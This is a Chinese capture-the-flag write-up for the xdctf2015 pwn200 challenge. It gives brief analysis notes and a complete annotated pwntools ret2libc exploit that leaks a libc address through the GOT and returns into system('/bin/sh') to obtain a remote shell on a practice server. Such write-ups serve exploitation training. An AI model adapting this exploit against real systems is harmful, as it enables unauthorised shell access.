xdctf2015_pwn200
一题标准的ret2libc3套路题
惯例先checksec一下
开启了NX保护的32位程序，放进IDA里看看
main函数没啥信息 进vuln函数看看
一个非常标准的栈溢出，Shift+F12看看字符串表
没有找到system和/bin/sh，估计应该是ret2libc3的套路
exp:
"""Two-stage ret2libc exploit for the xdctf2015 pwn200 challenge binary (./bof).

Stage 1 overflows the stack buffer in vuln() and returns into write@plt to
leak write's resolved libc address out of the GOT, then returns to main so
the overflow can be triggered a second time.  Stage 2 uses the leak to
compute the libc base (via LibcSearcher) and returns into system("/bin/sh").

Why this works with NX enabled (see the writeup above): no shellcode is
placed on the stack; only addresses of code that already exists (PLT stub,
libc functions) are written, which NX does not prevent.  The script also
treats elf.sym / elf.plt / elf.got values as absolute run-time addresses,
i.e. it presumes the binary is not PIE -- confirm with checksec.

Note: the payloads concatenate a str ('a' * N) with the bytes returned by
p32(); this is Python 2-era pwntools usage and would raise TypeError under
Python 3, where the padding would need to be a bytes literal.
"""
from pwn import *
from LibcSearcher import *
# Remote challenge instance; host/port are specific to the writeup's deployment.
io=remote('node4.buuoj.cn',25079)
elf=ELF('./bof')
# Fixed addresses taken from the binary: main (to return into after the leak),
# write's PLT stub (callable gadget) and write's GOT slot (holds the libc address).
main_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']
# Drain whatever the program prints before reading input.
io.recv()
# Stage 1 frame: 0x6c bytes of buffer + 4 bytes (presumably the saved ebp --
# confirm against the vuln() frame in IDA), then:
#   return address  -> write@plt
#   write's return  -> main (re-enter the vulnerable function)
#   args            -> write(1, &write@got, 4): send 4 bytes of the GOT entry to fd 1
payload='a'*(0x6c+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
io.sendline(payload)
# Leak: exactly 4 bytes expected, unpacked as a 32-bit little-endian address.
# This assumes the 4 leaked bytes arrive in a single recv and are not mixed
# with other program output.
write_addr=u32(io.recv(4))
print(hex(write_addr))
# Identify the remote libc from the leaked write address, then derive the
# base and the two targets needed for stage 2 from its symbol offsets.
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
# Program has restarted from main; drain its output again.
io.recv()
# Stage 2 frame: same padding, then system as the return address, main as
# system's return address, and the "/bin/sh" string pointer as its argument.
payload='a'*(0x6c+4)+p32(system)+p32(main_addr)+p32(bin_sh)
io.sendline(payload)
# Hand the connection over to the user once the shell is up.
io.interactive()